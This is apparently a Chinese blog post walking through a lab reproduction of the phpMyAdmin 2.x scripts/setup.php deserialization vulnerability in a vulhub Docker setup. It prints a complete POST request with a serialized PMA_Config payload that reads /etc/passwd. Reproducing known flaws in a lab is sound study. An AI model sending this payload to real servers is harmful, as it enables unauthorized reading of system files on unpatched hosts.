phpmyadmin scriptssetup.php 反序列化漏洞

phpmyadmin scriptssetup.php 反序列化漏洞

phpmyadmin scriptssetup.php 反序列化漏洞(WooYun-2016-199433)

phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。


漏洞环境

我们先下载环境,在github有别人直接搭建好的docker环境我们直接拿来用即可

git clone git://github.com/vulhub/vulhub.git
cd vulhub/phpmyadmin/WooYun-2016-199433/
docker-compose up -d

访问IP:8080即可,因为没有连接数据库,所以此时会报错,但我们这个漏洞的利用与数据库无关,我们不用管他就行。

phpmyadmin scriptssetup.php 反序列化漏洞


影响版本

phpMyAdmin

2.x


漏洞复现

我们构造URL

POST请求 ip:8080/scripts/setup.php

POST /scripts/setup.php HTTP/1.1
Host: 192.168.200.23:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Cache: no-cache
Origin: moz-extension://d2882cd5-38d6-4b0c-9bb9-189722962513
Content-Length: 80
Connection: close
Cookie: pma_lang=zh_CN; pma_collation_connection=utf8_unicode_ci; phpMyAdmin=0de109133be667550d76562dc3e9ec1f; auto_saved_sql_sort=
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

然后发现能访问passwd内容

phpmyadmin scriptssetup.php 反序列化漏洞

phpmyadmin scriptssetup.php 反序列化漏洞

上一篇:.Net Core——用代码写代码?


下一篇:ue4 LineTrace offset when move fast